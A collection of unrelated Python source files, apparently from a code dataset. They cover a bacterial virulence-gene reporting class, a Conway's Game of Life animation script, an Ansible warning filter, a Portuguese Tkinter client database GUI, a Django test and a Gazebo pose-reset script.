class Virulence(GeneSippr):
def runner(self):
"""
Run the necessary methods in the correct order
"""
vir_report = os.path.join(self.reportpath, 'virulence.csv')
if os.path.isfile(vir_report):
self.report_parse(vir_report)
else:
logging.info('Starting {at} analysis pipeline'.format(at=self.analysistype))
if not self.pipeline:
general = None
for sample in self.runmetadata.samples:
general = getattr(sample, 'general')
if general is None:
# Create the objects to be used in the analyses
objects = Objectprep(self)
objects.objectprep()
self.runmetadata = objects.samples
Sippr(inputobject=self,
cutoff=self.cutoff,
k=19,
allow_soft_clips=True)
# Create the reports
self.reporter()
# Print the metadata
MetadataPrinter(self)
def report_parse(self, vir_report):
"""
        Parse an existing report and extract the results
:param vir_report: type STR: Name and absolute path of the report
"""
for sample in self.runmetadata.samples:
setattr(sample, self.analysistype, GenObject())
sample[self.analysistype].results = dict()
sample[self.analysistype].avgdepth = dict()
with open(vir_report, 'r') as report:
next(report)
for line in report:
try:
strain, gene, allele, description, accession, perc_ident, fold_cov = line.rstrip().split(',')
if sample.name in line:
if strain:
name = '{gene}_{accession}_{allele}'.format(gene=gene,
accession=accession,
allele=allele)
sample[self.analysistype].results[name] = perc_ident
sample[self.analysistype].avgdepth[name] = fold_cov
except ValueError:
pass
def reporter(self):
"""
Creates a report of the results
"""
        # Create a dictionary mapping gene names (without alleles or accessions, e.g.
        # sul1_18_AY260546 becomes sul1) to their descriptions
        genedict = dict()
# Load the notes file to a dictionary
notefile = os.path.join(self.targetpath, 'notes.txt')
with open(notefile, 'r') as notes:
for line in notes:
# Ignore comment lines - they will break the parsing
if line.startswith('#'):
continue
# Split the line on colons e.g. stx1Aa: Shiga toxin 1, subunit A, variant a: has three variables after
# the split: gene(stx1Aa), description(Shiga toxin 1, subunit A, variant a), and _(\n)
try:
gene, description, _ = line.split(':')
# There are exceptions to the parsing. Some lines only have one :, while others have three. Allow for
# these possibilities.
except ValueError:
try:
gene, description = line.split(':')
except ValueError:
gene, description, _, _ = line.split(':')
# Set up the description dictionary
genedict[gene] = description.replace(', ', '_').strip()
# Find unique gene names with the highest percent identity
for sample in self.runmetadata.samples:
try:
if sample[self.analysistype].results:
# Initialise a dictionary to store the unique genes, and their percent identities
sample[self.analysistype].uniquegenes = dict()
for name, identity in sample[self.analysistype].results.items():
# Split the name of the gene from the string e.g. stx1:11:Z36899:11 yields stx1
if ':' in name:
sample[self.analysistype].delimiter = ':'
else:
sample[self.analysistype].delimiter = '_'
genename = name.split(sample[self.analysistype].delimiter)[0]
# Set the best observed percent identity for each unique gene
try:
# Pull the previous best identity from the dictionary
bestidentity = sample[self.analysistype].uniquegenes[genename]
# If the current identity is better than the old identity, save it
if float(identity) > float(bestidentity):
sample[self.analysistype].uniquegenes[genename] = float(identity)
# Initialise the dictionary if necessary
except KeyError:
sample[self.analysistype].uniquegenes[genename] = float(identity)
except AttributeError:
raise
# Create the path in which the reports are stored
make_path(self.reportpath)
# Initialise strings to store the results
data = 'Strain,Gene,Subtype/Allele,Description,Accession,PercentIdentity,FoldCoverage\n'
with open(os.path.join(self.reportpath, self.analysistype + '.csv'), 'w') as report:
for sample in self.runmetadata.samples:
try:
if sample[self.analysistype].results:
                        # Iterate through all the results for the sample
for name, identity in sorted(sample[self.analysistype].results.items()):
# Check to see which delimiter is used to separate the gene name, allele, accession, and
# subtype information in the header
if len(name.split(sample[self.analysistype].delimiter)) == 4:
# Split the name on the delimiter: stx2A:63:AF500190:d; gene: stx2A, allele: 63,
# accession: AF500190, subtype: d
genename, allele, accession, subtype = name.split(sample[self.analysistype].delimiter)
elif len(name.split(sample[self.analysistype].delimiter)) == 3:
                                # Treat samples with no subtype, e.g. icaC:intercellular adhesion protein C, differently.
                                # Extract the allele as the 'subtype', and the gene name and accession as above
genename, subtype, accession = name.split(sample[self.analysistype].delimiter)
else:
genename = name
subtype = ''
accession = ''
# Retrieve the best identity for each gene
percentid = sample[self.analysistype].uniquegenes[genename]
# If the percent identity of the current gene matches the best percent identity, add it to
# the report - there can be multiple occurrences of genes e.g.
# sul1,1,AY224185,100.00,840 and sul1,2,CP002151,100.00,927 are both included because they
# have the same 100% percent identity
if float(identity) == percentid:
                                    # Look up the gene description parsed from the notes file,
                                    # defaulting to 'ND' if the gene is not annotated
try:
description = genedict[genename]
except KeyError:
description = 'ND'
# Populate the results
data += '{samplename},{gene},{subtype},{description},{accession},{identity},{depth}\n' \
.format(samplename=sample.name,
gene=genename,
subtype=subtype,
description=description,
accession=accession,
identity=identity,
depth=sample[self.analysistype].avgdepth[name])
else:
data += sample.name + '\n'
except (KeyError, AttributeError):
data += sample.name + '\n'
# Write the strings to the file
report.write(data)
def __init__(self, args, pipelinecommit, startingtime, scriptpath, analysistype, cutoff, pipeline, revbait,
allow_soft_clips=False):
self.runmetadata = args.runmetadata
self.path = os.path.join(args.path)
try:
self.targetpath = os.path.join(args.targetpath, analysistype)
except AttributeError:
self.targetpath = os.path.join(args.reffilepath, analysistype)
self.logfile = args.logfile
self.cpus = args.cpus
super().__init__(self, pipelinecommit, startingtime, scriptpath, analysistype, cutoff, pipeline,
revbait, allow_soft_clips)
self.runner()
|
python
|
'''
MIT License
Copyright (c) 2020 Georg Thurner
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
'''
# 20 Conway's Game of Life (1000 points)
# Prepare a script running a simulation of "Conway's Game of Life" on a board
# N x N, initially filled randomly with a probability p, for a number of steps
# M. The variables N, p and M are provided by the user. Use periodic boundary
# conditions. The output should be an animated GIF. Also prepare a script
# providing two animated GIFs, for the Gosper glider gun and the Simkin glider
# gun, on a board N x N for a number of steps M.
import numpy as np
import time
import itertools
import matplotlib.pyplot as plt
import matplotlib.animation as animation
from progress.bar import IncrementalBar
from PIL import Image
class InputError(Exception):
'''
Additional exception that can be raised to hint at wrong input.
Takes and returns expression(where the Error occurs) and message.
'''
def __init__(self, expression, message):
self.expression = expression
self.message = message
class Conways_Game_Of_Life:
'''
Conways game of life.
Object consists of a board saved as numpy array
Initialisation can either be done via 2d arraylike input as start_conf or via a given boardsize
If boardsize is given and p_life is given, cells life with this probability, if not initialised with zeros
'''
def __init__(self,boardsize = None, start_conf = None, p_life = None):
        if boardsize is None and start_conf is None:
            raise InputError("__init__", "Expect either a tuple for boardsize or a 2dim arraylike for start_conf")
        elif boardsize is not None and start_conf is not None:
            raise InputError("__init__", "Expect only either boardsize or start_conf")
        elif boardsize is not None:
            self.height = boardsize[0]
            self.length = boardsize[1]
            if p_life is not None:
board = []
for i in range(self.height * self.length):
board.append(np.random.choice(2,p = [1-p_life,p_life]))
self.board = np.array(board).reshape((self.height,self.length))
else:
self.board = np.zeros(shape = [self.height,self.length],dtype='int')
else:
self.board = np.array(start_conf)
self.height = self.board.shape[0]
self.length = self.board.shape[1]
def __str__(self):
return(np.array_str(self.board))
def evolution_step(self):
        '''Computes the next evolution step and returns it'''
        # Matrix where, for each index, all eight neighbouring cells are summed; np.roll wraps
        # around the edges, giving the periodic boundary conditions
added_ngbh = sum(np.roll(np.roll(self.board,i,0),j,1) for i,j in itertools.product((-1,0,1),(-1,0,1)) if(i != 0 or j != 0))
#Use bitwise operation to return elementwise 0 and 1
return (self.board & (added_ngbh == 2)) | (added_ngbh == 3)
def create_gif(self, steps, milsec_per_frame = 50, gif_name = 'ConwaysGameOfLife', dpi = 80):
'''
Creates a gif with x steps from the given start setup
milsec_per_frame: time each step is displayed in milliseconds; defaults to 50
gif_name: sets the name of the outputfile; defaults to 'ConwaysGameOfLife'
        dpi: resolution (dots per inch) of the rendered frames; defaults to 80
'''
original_board = self.board
bar = IncrementalBar('Processing: '+gif_name, max=steps+1, suffix= '%(percent)d%%')
def update(i):
self.board = self.evolution_step()
img.set_data(self.board)
ax.set_axis_off()
bar.next()
fig, ax = plt.subplots()
img = ax.imshow(self.board,cmap = "Greys")
anim = animation.FuncAnimation(fig, update, frames=np.arange(0, steps), interval=milsec_per_frame)
anim.save( (gif_name +'.gif'), dpi=dpi, writer='imagemagick')
plt.close()
bar.finish()
self.board = original_board
def insert_construct(self,construct, coord):
'''
Inserts a given 2d array like construct at the given coord(tuple)
starting counting by 0 (coord refer to the left upper entry)
'''
        # One could catch thousands of possible errors here; instead, rely on sensible input
        # (only 0s and 1s in the matrix, sizes that fit on the board, etc.)
        construct = np.array(construct)  # e.g. prevents indexing errors if a list of lists was given
self.board[np.ix_(range(coord[0],construct.shape[0]+coord[0]), range(coord[1],construct.shape[1]+coord[1]))] = construct
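# A quick sanity check of evolution_step (an added sketch, not part of the
# original script): a "blinker" oscillates with period 2, so two evolution
# steps reproduce the starting board. This exercises both the np.roll
# neighbour sum with periodic boundaries and the bitwise survival/birth rule.
_blinker = Conways_Game_Of_Life(start_conf=[[0, 0, 0, 0, 0],
                                            [0, 0, 0, 0, 0],
                                            [0, 1, 1, 1, 0],
                                            [0, 0, 0, 0, 0],
                                            [0, 0, 0, 0, 0]])
_start = _blinker.board.copy()
_blinker.board = _blinker.evolution_step()
_blinker.board = _blinker.evolution_step()
assert (_blinker.board == _start).all()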
gosper_glidergun = [[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0],[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,1,0,0,0,0,0,0,0,0,0,0,0],[0,0,0,0,0,0,0,0,0,0,0,0,1,1,0,0,0,0,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,1,1],[0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,1,0,0,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,1,1],[1,1,0,0,0,0,0,0,0,0,1,0,0,0,0,0,1,0,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0],[1,1,0,0,0,0,0,0,0,0,1,0,0,0,1,0,1,1,0,0,0,0,1,0,1,0,0,0,0,0,0,0,0,0,0,0],[0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,1,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0],[0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],[0,0,0,0,0,0,0,0,0,0,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]]
simkin_glidergun = [[1,1,0,0,0,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],[1,1,0,0,0,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],[0,0,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],[0,0,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,0,1,1,0,0,0,0,0,0],[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,1,0,0,0,0,0],[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,1,0,0,1,1],[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,1,0,0,0,1,0,0,0,1,1],[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0]]
glider_death = [[1,1,0,0],[1,0,0,0],[0,1,1,1],[0,0,0,1]]
rand_game_of_life = Conways_Game_Of_Life(boardsize = (100,100), p_life = 0.6)
rand_game_of_life.create_gif(100,milsec_per_frame = 10)
glidergun1 = Conways_Game_Of_Life(boardsize = (100,100))
glidergun1.insert_construct(gosper_glidergun,(0,0))
glidergun1.insert_construct(glider_death,(80,93))
glidergun1.create_gif(2000, gif_name = "gosper_glidergun")
glidergun2 = Conways_Game_Of_Life(boardsize = (100,100))
glidergun2.insert_construct(simkin_glidergun,(20,20))
glidergun2.create_gif(1000,gif_name = "simkin_glidergun",milsec_per_frame = 20)
|
python
|
import subprocess
import re
def subprocess_runner(cmd_list, exercise_dir):
with subprocess.Popen(
cmd_list, stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=exercise_dir
) as proc:
std_out, std_err = proc.communicate()
return (std_out.decode(), std_err.decode(), proc.returncode)
def remove_ansible_warnings(output, warning_list=None):
"""Remove the specified warnings from std_err."""
if warning_list is None:
warning_list = [
r"^.WARNING.: Ignoring timeout.10. for .*$",
]
# Remove warnings one at a time from std_err
for ansible_warn in warning_list:
output = re.sub(ansible_warn, "", output, flags=re.M)
return output.strip()
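# Example usage (an added sketch, not part of the original helpers): run a
# command and strip any matching warning lines from its stderr. Assumes a
# POSIX environment where the `ls` command exists.
if __name__ == "__main__":
    std_out, std_err, return_code = subprocess_runner(["ls"], exercise_dir=".")
    std_err = remove_ansible_warnings(std_err)
    print(return_code, std_err)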
|
python
|
import os
import time
import math
from tkinter import *
import tkinter.ttk as ttk
from ClientEdit import *
from ClientInsert import *
from ClientView import *
class ClientList(Tk):
def label_combo(self, text, frame=None):
        if frame is None:
frame = self.__frame_border
frame = Frame(frame)
label = Label(frame, text=text)
combobox = ttk.Combobox(frame, state='readonly')
label.grid(row=0, column=0)
combobox.grid(row=0, column=1)
return [frame, combobox]
def __init__(self, db):
super().__init__()
if os.name == 'nt':
self.geometry("{}x{}+{}+{}".format(
1008, 590,
self.winfo_screenwidth()//2 - 1085//2,
self.winfo_screenheight()//2 - 590//2
)
)
else:
self.geometry("{}x{}+{}+{}".format(
1085, 590,
self.winfo_screenwidth()//2 - 1085//2,
self.winfo_screenheight()//2 - 590//2
)
)
self.__db = db
self.title("Listagem de Clientes")
self.resizable(False, False)
self.__frame_border = Frame(self)
self.__label_pesquisa = Label(self.__frame_border,
text="Pesquisa:")
self.__label_pesquisa.grid(row=0, column=0, stick='w')
self.__entry_pesquisa = Entry(self.__frame_border)
self.__entry_pesquisa.grid(row=1, column=0, stick='ew')
self.__entry_pesquisa.focus()
self.__frame_row2 = Frame(self.__frame_border)
tmp = self.label_combo("Pesquisar por:", self.__frame_row2)
self.__frame_selecao_pesquisa = tmp[0]
self.__combo_selecao_pesquisa = tmp[1]
self.__combo_selecao_pesquisa['values'] = ["Razão Social", "CNPJ"]
self.__combo_selecao_pesquisa.current(0)
self.__frame_selecao_pesquisa.grid(row=0, column=0, stick='w', pady=4)
tmp = self.label_combo("Ordem:", self.__frame_row2)
self.__frame_ordem = tmp[0]
self.__combo_ordem = tmp[1]
self.__combo_ordem['values'] = ["Crescente", "Decrescente"]
self.__combo_ordem.current(0)
self.__frame_ordem.grid(row=0, column=1, stick='w', pady=4)
self.__button_filtrar = Button(self.__frame_row2, text='Filtrar',
command=self.filter_client)
self.__button_filtrar.grid(row=0, column=2, stick='e')
self.__frame_row2.grid_columnconfigure(index=2, weight=1)
self.__frame_row2.grid(row=2, column=0, stick='ew')
self.__frame_row3 = Frame(self.__frame_border)
campo_values = [
"Razão Social",
"Nome Fantasia",
"CNPJ",
"Inscrição Estadual",
"Inscrição Municipal",
"Logradouro",
"Complemento",
"Bairro",
"Municipio",
"UF",
"CEP",
"Telefone",
"Celular",
"E-mail",
"URL"]
tmp = self.label_combo("Campo 1:", self.__frame_row3)
self.__frame_campo_1 = tmp[0]
self.__combo_campo_1 = tmp[1]
self.__combo_campo_1['values'] = campo_values
self.__combo_campo_1.current(0)
self.__frame_campo_1.grid(row=0, column=0, stick='ew', pady=4)
tmp = self.label_combo("Campo 2:", self.__frame_row3)
self.__frame_campo_2 = tmp[0]
self.__combo_campo_2 = tmp[1]
self.__combo_campo_2['values'] = campo_values
self.__combo_campo_2.current(1)
self.__frame_campo_2.grid(row=0, column=1, stick='ew', pady=4)
tmp = self.label_combo("Campo 3:", self.__frame_row3)
self.__frame_campo_3 = tmp[0]
self.__combo_campo_3 = tmp[1]
self.__combo_campo_3['values'] = campo_values
self.__combo_campo_3.current(2)
self.__frame_campo_3.grid(row=0, column=2, stick='ew', pady=4)
tmp = self.label_combo("Campo 4:", self.__frame_row3)
self.__frame_campo_4 = tmp[0]
self.__combo_campo_4 = tmp[1]
self.__combo_campo_4['values'] = campo_values
self.__combo_campo_4.current(3)
self.__frame_campo_4.grid(row=0, column=3, stick='ew', pady=4)
tmp = self.label_combo("Página:", self.__frame_row3)
self.__frame_pagina = tmp[0]
self.__combo_pagina = tmp[1]
self.__str_pagina = StringVar()
self.__combo_pagina['textvariable'] = self.__str_pagina
self.__combo_pagina['values'] = ["0"]
self.__combo_pagina.current(0)
self.__str_pagina.trace("w", self.__change_pagina)
self.__frame_pagina.grid(row=0, column=4, stick='ew', pady=4)
self.__frame_row3.grid(row=3, column=0)
self.__tree = ttk.Treeview(self.__frame_border, height=21)
self.__tree["columns"] = (1, 2, 3, 4)
self.__tree["show"] = "headings"
self.__tree.heading(1, text="Razão Social")
self.__tree.heading(2, text="Nome Fantasia")
self.__tree.heading(3, text="CNPJ")
self.__tree.heading(4, text="Inscrição Estadual")
self.__tree.column(1, width=200)
self.__tree.column(2, width=200)
self.__tree.column(3, width=200)
self.__tree.column(4, width=200)
self.__tree.grid(row=4, column=0, stick='ew')
self.__tree.bind('<Button-1>', self.__handle_click)
self.__frame_row5 = Frame(self.__frame_border)
self.__button_inserir = Button(self.__frame_row5, text='Inserir',
command=self.__insert_client)
self.__button_editar = Button(self.__frame_row5, text='Editar',
command=self.__edit_client)
self.__button_consultar = Button(self.__frame_row5, text='Consultar',
command=self.__view_client)
self.__button_deletar = Button(self.__frame_row5, text='Deletar',
command=self.__delete_client)
self.__button_inserir.grid(row=0, column=0, stick='e', padx=4)
self.__button_editar.grid(row=0, column=1, stick='e', padx=4)
self.__button_consultar.grid(row=0, column=2, stick='e', padx=4)
self.__button_deletar.grid(row=0, column=3, stick='e', padx=4)
self.__frame_row5.grid_columnconfigure(index=0, weight=1)
self.__frame_row5.grid_columnconfigure(index=1, weight=0)
self.__frame_row5.grid_columnconfigure(index=2, weight=0)
self.__frame_row5.grid_columnconfigure(index=3, weight=0)
self.__frame_row5.grid(row=5, column=0, stick='ew', pady=4)
self.__frame_border.grid(row=0, column=0,
stick='ew', padx=10, pady=10)
self.filter_client()
def __handle_click(self, event):
if self.__tree.identify_region(event.x, event.y) == "separator":
return "break"
def __combo_to_database(self, value):
if value == "Razão Social":
return "rsocial_cliente"
if value == "Nome Fantasia":
return "nfantasia_cliente"
if value == "CNPJ":
return "cnpj_cliente"
if value == "Inscrição Estadual":
return "iestadual_cliente"
if value == "Inscrição Municipal":
return "imunicipal_cliente"
if value == "Logradouro":
return "logradouro_cliente"
if value == "Complemento":
return "complemento_cliente"
if value == "Bairro":
return "bairro_cliente"
if value == "CEP":
return "cep_cliente"
if value == "Celular":
return "ncel_cliente"
if value == "Telefone":
return "numero_telefone"
if value == "Municipio":
return "nome_municipio"
if value == "UF":
return "nome_uf"
if value == "URL":
return "url_cliente"
if value == "E-mail":
return "email_cliente"
def __format_result(self, name, value):
if name == "cnpj_cliente":
value = str(value)
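            # e.g. "12345678000195" -> "12.345.678/0001.95" (assumes a 14-digit CNPJ string)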
return value[:2] + "." + value[2:5] + "." + value[5:8] + "/" + value[8:12] + "." + value[12:15]
if name == "iestadual_cliente":
value = str(value)
return value[:3] + "." + value[3:6] + "." + value[6:9] + "." + value[9:]
if name == "imunicipal_cliente":
value = str(value)
return value[:1] + "." + value[1:4] + "." + value[4:7] + "-" + value[7:]
if name == "cep_cliente":
value = str(value)
return value[:5] + "-" + value[5:]
if name == "numero_telefone":
tmp = ""
for element in value:
if (int(element["numero_telefone"]) != 0 and
int(element["ddd_telefone"]) != 0):
tmp += "(" + str(element["ddd_telefone"]) + ") "
tmp += str(element["numero_telefone"])[:4] + "-"
tmp += str(element["numero_telefone"])[4:] + "; "
            if tmp.endswith("; "):
                tmp = tmp[:-2]
return tmp
if name == "ncel_cliente":
value = str(value)
return value[:1] + " " + value[1:5] + "-" + value[5:]
if name == "ddd_cel_cliente":
value = str(value)
return "(" + value[:2] + ") "
value = str(value)
return value
def __general_client_query(self, field):
campo_pesquisa = self.__combo_to_database(self.__combo_selecao_pesquisa.get())
campo_ordem = "ASC" if self.__combo_ordem.get() == "Crescente" else "DESC"
if len(self.__entry_pesquisa.get()) == 0:
table = self.__db.select("CLIENTE", [field],
order_by=campo_pesquisa + " " + campo_ordem)
else:
table = self.__db.select("CLIENTE",
[field],
[campo_pesquisa],
[self.__entry_pesquisa.get()],
like=True,
order_by=campo_pesquisa + " " + campo_ordem)
if (field == "cnpj_cliente" or field == "iestadual_cliente" or
field == "imunicipal_cliente" or field == "cep_cliente"):
for i in range(len(table)):
zeroes_to_add = 0
if field == "cnpj_cliente":
if len(str(table[i][field])) < 14:
zeroes_to_add = 14 - len(str(table[i][field]))
elif field == "iestadual_cliente":
if len(str(table[i][field])) < 12:
zeroes_to_add = 12 - len(str(table[i][field]))
elif field == "imunicipal_cliente":
if len(str(table[i][field])) < 8:
zeroes_to_add = 8 - len(str(table[i][field]))
elif field == "cep_cliente":
if len(str(table[i][field])) < 8:
zeroes_to_add = 8 - len(str(table[i][field]))
if zeroes_to_add != 0:
for j in range(zeroes_to_add):
table[i][field] = "0" + str(table[i][field])
tmp = []
for i in range(len(table)):
tmp.append(self.__format_result(field, table[i][field]))
return tmp
def __nome_municipio_query(self):
id_list = self.__general_client_query('id_cliente')
tmp = []
for ident in id_list:
id_municipio_cliente = str(self.__db.select("CLIENTE",
["id_municipio_cliente"],
["id_cliente"],
[str(ident)]
)[0]["id_municipio_cliente"])
nome_municipio = str(self.__db.select("MUNICIPIO",
["nome_municipio"],
["id_municipio"],
[id_municipio_cliente])[0]["nome_municipio"])
tmp.append(nome_municipio)
return tmp
def __nome_uf_query(self):
id_list = self.__general_client_query('id_cliente')
tmp = []
for ident in id_list:
id_municipio_cliente = str(self.__db.select("CLIENTE",
["id_municipio_cliente"],
["id_cliente"],
[str(ident)]
)[0]["id_municipio_cliente"])
id_uf_municipio = str(self.__db.select("MUNICIPIO",
["id_uf_municipio"],
["id_municipio"],
[id_municipio_cliente])[0]["id_uf_municipio"])
nome_uf = str(self.__db.select("UF",
["nome_uf"],
["id_uf"],
[id_uf_municipio])[0]["nome_uf"])
tmp.append(nome_uf)
return tmp
def __numero_telefone_query(self):
id_list = self.__general_client_query('id_cliente')
tmp = []
for ident in id_list:
table = self.__db.select("TELEFONE",
["ddd_telefone", "numero_telefone"],
["id_cliente_telefone"],
[str(ident)])
tmp.append(self.__format_result("numero_telefone", table))
return tmp
def __ncel_cliente_query(self):
ddd = self.__general_client_query('ddd_cel_cliente')
ncel = self.__general_client_query('ncel_cliente')
tmp = []
for i in range(len(ddd)):
full = str(ddd[i]) + str(ncel[i])
tmp.append(full)
return tmp
def __process_pag_number(self):
pag_number = math.ceil(len(self.__table_cliente[0])/20)
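        # e.g. 45 results -> ceil(45/20) = 3 pages, numbered 0, 1 and 2 in the combobox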
tmp = []
for i in range(pag_number):
tmp.append(i)
self.__combo_pagina['values'] = tmp
self.__combo_pagina.current(0)
def filter_client(self):
for i in self.__tree.get_children():
self.__tree.delete(i)
self.__tree.heading(1, text=self.__combo_campo_1.get())
self.__tree.heading(2, text=self.__combo_campo_2.get())
self.__tree.heading(3, text=self.__combo_campo_3.get())
self.__tree.heading(4, text=self.__combo_campo_4.get())
self.__campo_db = ["id_cliente"]
self.__campo_db.append(self.__combo_to_database(
self.__combo_campo_1.get()))
self.__campo_db.append(self.__combo_to_database(
self.__combo_campo_2.get()))
self.__campo_db.append(self.__combo_to_database(
self.__combo_campo_3.get()))
self.__campo_db.append(self.__combo_to_database(
self.__combo_campo_4.get()))
self.__table_cliente = []
for campo in self.__campo_db:
if campo == "nome_uf":
self.__table_cliente.append(self.__nome_uf_query())
continue
elif campo == "nome_municipio":
self.__table_cliente.append(self.__nome_municipio_query())
continue
elif campo == "numero_telefone":
self.__table_cliente.append(self.__numero_telefone_query())
continue
elif campo == "ncel_cliente":
self.__table_cliente.append(self.__ncel_cliente_query())
continue
self.__table_cliente.append(self.__general_client_query(campo))
self.__process_pag_number()
if len(self.__table_cliente[0]) == 0:
self.__tree.insert('', 'end', values=[
"Sem resultados.",
"", "", ""])
self.__button_consultar["state"] = "disabled"
self.__button_editar["state"] = "disabled"
self.__button_deletar["state"] = "disabled"
child_id = self.__tree.get_children()[0]
self.__tree.focus(child_id)
self.__tree.selection_set(child_id)
return
self.__button_consultar["state"] = "normal"
self.__button_editar["state"] = "normal"
self.__button_deletar["state"] = "normal"
child_id = self.__tree.get_children()[0]
self.__tree.focus(child_id)
self.__tree.selection_set(child_id)
def __change_pagina(self, *args):
for i in self.__tree.get_children():
self.__tree.delete(i)
values = ["", "", "", ""]
actual_index = int(self.__combo_pagina.get())*20
consult_size = len(self.__table_cliente[0])
if actual_index + 20 > consult_size:
final_index = consult_size
else:
final_index = actual_index + 20
for i in range(actual_index, final_index):
values[0] = self.__table_cliente[1][i]
values[1] = self.__table_cliente[2][i]
values[2] = self.__table_cliente[3][i]
values[3] = self.__table_cliente[4][i]
self.__tree.insert('', 'end', values=values)
return
def __get_client_id(self):
selection = self.__tree.index(self.__tree.selection())
return self.__table_cliente[0][selection+(20*int(self.__combo_pagina.get()))]
def __insert_client(self):
instance_insert = ClientInsert(self.__db, self)
self.filter_client()
def __edit_client(self):
instance_edit = ClientEdit(self.__db, self.__get_client_id(), self)
self.filter_client()
def __view_client(self):
instance_view = ClientView(self.__db, self.__get_client_id(), self)
self.filter_client()
def __delete_client(self):
if messagebox.askyesno("Questão", "Deseja excluir?"):
selected_id = str(self.__get_client_id())
self.__db.delete("TELEFONE",
["id_cliente_telefone"], [selected_id])
self.__db.delete("CLIENTE",
["id_cliente"], [selected_id])
self.filter_client()
|
python
|
# coding=utf-8
from django.test import TestCase
from django.test.utils import override_settings
class SlugFieldTest(TestCase):
def test_slugfield_allow_unicode_kwargs_precedence(self):
from wshop.models.fields.slugfield import SlugField
with override_settings(WSHOP_SLUG_ALLOW_UNICODE=True):
slug_field = SlugField(allow_unicode=False)
self.assertFalse(slug_field.allow_unicode)
slug_field = SlugField()
self.assertTrue(slug_field.allow_unicode)
|
python
|
#!/usr/bin/env python
"""Use to reset pose of model for simulation."""
import rospy
from gazebo_msgs.msg import ModelState
def set_object(name, pos, ori):
msg = ModelState()
msg.model_name = name
msg.pose.position.x = pos[0]
msg.pose.position.y = pos[1]
msg.pose.position.z = pos[2]
msg.pose.orientation.w = ori[0]
msg.pose.orientation.x = ori[1]
msg.pose.orientation.y = ori[2]
msg.pose.orientation.z = ori[3]
msg.reference_frame = 'world'
set_mode_pub.publish(msg)
    print(msg)
if __name__ == '__main__':
rospy.init_node('set_obj')
print("set_link_state")
set_mode_pub = rospy.Publisher(
'/gazebo/set_model_state',
ModelState,
queue_size=1,
latch=True
)
names = ('lunchbox1', 'lunchbox2', 'lunchbox3', 'lunchbox4',
'drink1', 'drink2', 'drink3', 'drink4',
'riceball1', 'riceball2', 'riceball3', 'riceball4')
pos = ((-0.492, -0.16, 0.7),
(-0.492, -0.16, 0.75),
(-0.492, 0.16, 0.7),
(-0.492, 0.16, 0.75),
(-0.26, 0.11, 0.76),
(-0.36, 0.11, 0.76),
(-0.26, 0.21, 0.76),
(-0.36, 0.21, 0.76),
(-0.235, -0.2, 0.7),
(-0.33, -0.2, 0.7),
(-0.235, -0.1, 0.7),
(-0.33, -0.1, 0.7))
ori = ((0, 0, 0, 1),
(0, 0, 0, 1),
(0, 0, 0, 1),
(0, 0, 0, 1),
(0, 0, 0, 0),
(0, 0, 0, 0),
(0, 0, 0, 0),
(0, 0, 0, 0),
(0, -1, 0, 1),
(0, -1, 0, 1),
(0, -1, 0, 1),
(0, -1, 0, 1))
for i, name in enumerate(names):
set_object(name, pos[i], ori[i])
rospy.sleep(0.1)
|
python
|
# pylint: disable=W0212
# type: ignore
"""深度封装Action方法
函数只能在群消息和好友消息接收函数中调用
"""
import sys
from .action import Action
from .collection import MsgTypes
from .exceptions import InvalidContextError
